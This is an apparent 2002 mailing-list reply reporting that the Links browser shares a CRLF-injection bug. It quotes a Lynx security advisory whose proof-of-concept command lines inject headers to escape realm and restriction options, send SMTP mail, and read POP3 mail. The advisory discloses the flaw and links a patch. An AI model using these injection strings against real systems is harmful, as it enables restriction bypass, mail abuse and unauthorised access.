The same bug seems to affects to the links browser. I have tested it with the 0.96 version. Links is another console browser with extended capabilities not supported by lynx like frames, colors and menus. On Thursday 22 August 2002 19:32, Ulf Harnhammar wrote: > Lynx CRLF Injection, part two > > > This is a follow-up to my "Lynx CRLF Injection" post a few days > ago. > > > * Lynx has got a realm feature that restricts users from accessing > any host apart from the host of its start page. That is, if you > start Lynx with "lynx -realm http://www.site1.st/";, you are not > allowed to go to http://www.site2.st/ . > > The CRLF Injection security hole allows users to break out of > realms - the command: > > $ lynx -realm "http://www.site1.st/ HTTP/1.0 > Host: www.site2.st > > " > > will show site2.st, despite the fact that it is outside of the realm. > > > * It allows users to send arbitrary cookies, user agents and > referers to a web server - even if you're using a restrictions option > saying that you're not allowed to change user agent: > > $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0 > User-Agent: Ulf 0.0 > Referer: http://www.metaur.nu/ > Cookie: user=ulf > > " > > > * It is also possible to use this hole for communication with other > types of servers than HTTP servers. You can send e-mails with it, for > example - even if you're using a restrictions option saying that > you're not allowed to send e-mails: > > $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0 > HELO my.own.site > MAIL FROM: <my.own@mail.address> > RCPT TO: <info@site1.st> > DATA > From: my.own@mail.address > To: info@site1.st > Subject: This is.. > > This is a URL that sends an e-mail (?). > . > QUIT > > " > > You have to use port 587, as Lynx blocks port 25. > > The MTA will complain about the "GET / HTTP/1.0" string, but it > still works. > > > * You can even use this hole for reading e-mails from a POP3 server: > > $ lynx "http://mail.site1.st:110/ HTTP/1.0 > USER ulf > PASS xxxx > LIST > RETR 1 > QUIT > > " > > The POP3 server will also complain about the "GET / HTTP/1.0" > string, but it still works with this technology as well. > > > * As previously noted, the holes listed above mostly affects programs > that start Lynx, interactively or not, with a URL wholly or partially > under the user's control. > > > * The patch for this hole has moved to: > ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch > > > // Ulf Harnhammar > ulfh@update.uu.se
